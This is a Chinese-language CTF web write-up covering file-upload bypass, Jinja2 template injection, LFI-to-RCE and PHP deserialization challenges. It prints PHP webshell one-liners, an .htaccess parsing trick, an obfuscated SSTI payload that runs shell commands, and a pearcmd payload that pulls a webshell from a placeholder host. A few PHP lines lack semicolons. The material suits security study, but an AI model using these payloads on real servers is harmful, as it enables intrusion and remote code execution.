CTF WEB WP杂谈

Hel1x

已于 2022-09-08 10:19:56 修改

阅读量629

点赞数

文章标签： php web安全 python

于 2022-06-05 13:03:10 首次发布

本文链接：https://blog.csdn.net/yoke__/article/details/125130863

版权

CTF WEB部分杂谈

funny_upload

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title></title>
</head>
<body>

<script language="javascript">
function Checkfiles()
{
var fup = document.getElementById('file');
var fileName = fup.value;
var ext = fileName.substring(fileName.lastIndexOf('.') + 1);
if(ext == "gif" || ext == "GIF" || ext == "JPEG" || ext == "jpeg" || ext == "jpg" || ext == "JPG" || ext == "png" || ext == "PNG")
{
return true;
}
else
{
alert("这个文件不好，我不喜欢");
return false;
}
}
</script>
<form method="post" onsubmit="return Checkfiles()" enctype="multipart/form-data" >
    <input type="file" name="file" id="file">
    <input  type="submit" name="1">
</form>

</body>
</html>

发现有js前端校验,开发者模式禁用JavaScript即可绕过
尝试上马

<?php@eval($_POST['shell']);?>

发现后端会 <? 有过滤

<script>alert('文件内容也改改呗~');</script>

尝试

<script language="php">@eval_r($_POST['hacker'])</script>

靶机php版本已经禁用该方法,尝试其他思路
发现可以上传.htaccess文件

AddType application/x-httpd-php png
php_value auto_append_file "php://filter/convert.base64-decode/resource=web.png"

将png解析为php并在php运行时运行指定的web.png文件
base64编码为了绕过 <? 过滤
上传.htaccess成功

uploads/c47b21fcf8f0bc8b3920541abd8024fd/.htaccess

上传base64编码的web.png

PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==

即

<?php@eval($_POST['shell']);?>

index.php和上传文件并不在同一个目录内
访问上传的文件

PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==

成功解析,上菜刀

Dest0g3{df92216a-8747-4bc9-b41c-6299693c9273}

EasySSTI

测试 {{7*7}} 显示49,说明有SSTI

 <div class="center-content error">
	<h1>Hello</h1>
	<h3>. in blacklist</h3>
 </div>

过滤了很多关键字

# 首先构造出所需的数字: 
{% set zero = (self|int) %}    # 0, 也可以使用lenght过滤器获取数字
{% set one = (zero**zero)|int %}    # 1
{% set two = (zero-one-one)|abs %}    # 2
{% set four = (two*two)|int %}    # 4
{% set five = (two*two*two)-one-one-one %}    # 5
{% set three = five-one-one %}    # 3
{% set nine = (two*two*two*two-five-one-one) %}    # 9
{% set seven = (zero-one-one-five)|abs %}    # 7

# 构造出所需的各种字符与字符串: 
{% set space = self|string|min %}    # 空格
{% set point = self|float|string|min %}    # .

{% set c = dict(c=aa)|reverse|first %}    # 字符 c
{% set bfh = self|string|urlencode|first %}    # 百分号 %
{% set bfhc = bfh~c %}    # 这里构造了%c, 之后可以利用这个%c构造任意字符。~用于字符连接
{% set slas = bfhc%((four~seven)|int) %}    # 使用%c构造斜杠 /
{% set yin = bfhc%((three~nine)|int) %}    # 使用%c构造引号 '
{% set xhx = bfhc%((nine~five)|int) %}    # 使用%c构造下划线 _
{% set right = bfhc%((four~one)|int) %}    # 使用%c构造右括号 )
{% set left = bfhc%((four~zero)|int) %}    # 使用%c构造左括号 (

{% set but = dict(buil=aa,tins=dd)|join %}    # builtins
{% set imp = dict(imp=aa,ort=dd)|join %}    # import
{% set pon = dict(po=aa,pen=dd)|join %}    # popen
{% set so = dict(o=aa,s=dd)|join %}    # os
{% set ca = dict(ca=aa,t=dd)|join %}    # cat
{% set flg = dict(fl=aa,ag=dd)|join %}    # flag
{% set ev = dict(ev=aa,al=dd)|join %}    # eval
{% set red = dict(re=aa,ad=dd)|join %}    # read
{% set bul = xhx~xhx~but~xhx~xhx %}    # __builtins__

{% set ini = dict(ini=aa,t=bb)|join %}    # init
{% set glo = dict(glo=aa,bals=bb)|join %}    # globals
{% set itm = dict(ite=aa,ms=bb)|join %}    # items

# 将上面构造的字符或字符串拼接起来构造出 __import__('os').popen('cat /flag').read(): 
{% set pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %}

# 然后将上面构造的各种变量添加到SSTI万能payload里面就行了: 
{% for f,v in (whoami|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %}    # globals
    {% if f == bul %} 
        {% for a,b in (v|attr(itm))() %}    # builtins
            {% if a == ev %}    # eval
                {{b(pld)}}    # eval("__import__('os').popen('cat /flag').read()")
            {% endif %}
        {% endfor %}
    {% endif %}
{% endfor %}

构造payload,空格用urlencode绕过

2022羊城杯

rce_me

参考
利用pearcmd.php从LFI到getshell
payload

/index.php/?file=/usr/local/lib/php/pearcmd.php& download http://vps/1.php

urlencode后

/index.php/?file=%2f%75%73%72%2f%6c%6f%63%61%6c%2f%6c%69%62%2f%70%68%70%2f%70%65%61%72%63%6d%64%2e%70%68%70&+download+http://vps/1.php

发起download命令去在目标url下载一句话木马
蚁剑连接后发现有flag但权限不够
date /f /flag报错信息中即可get flag

step_by_step-v3

<?php
error_reporting(0);
class yang
{
    public $y1;

    public function __construct()
    {
        $this->y1->magic();
    }

    public function __tostring()
    {
        ($this->y1)();
    }

    public function hint()
    {
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}

class cheng
{
    public $c1;

    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }

    public function __invoke()
    {
        $this->c1->hint();
    }
}

class bei
{
    public $b1;
    public $b2;

    public function __set($k1,$k2)
    {
        print $this->b1;
    }

    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}

if (isset($_POST['ans'])) {
    unserialize($_POST['ans']);
} else {
    highlight_file(__FILE__);
}
?>

flag在环境中，直接phpinfo()即可

<?php
class yang
{
	public $y1
}
class cheng
{
	public $c1
}
class bei
{
	public $b1
	public $b2
}
$a=new cheng();
$b=new bei();
$c=new yang();
$d=new cheng();
$d->c1=$c;
$a->c1=$b;
$b->b1=$c;
$c->y1="phpinfo";

echo(serialize($a))."\n";
echo(urlencode(serialize($a)));
?>

原文

O:5:"cheng":1:{s:2:"c1";O:3:"bei":2:{s:2:"b1";O:4:"yang":1:{s:2:"y1";s:7:"phpinfo";}s:2:"b2";N;}}

urlencode

O%3A5%3A%22cheng%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A3%3A%22bei%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A4%3A%22yang%22%3A1%3A%7Bs%3A2%3A%22y1%22%3Bs%3A7%3A%22phpinfo%22%3B%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D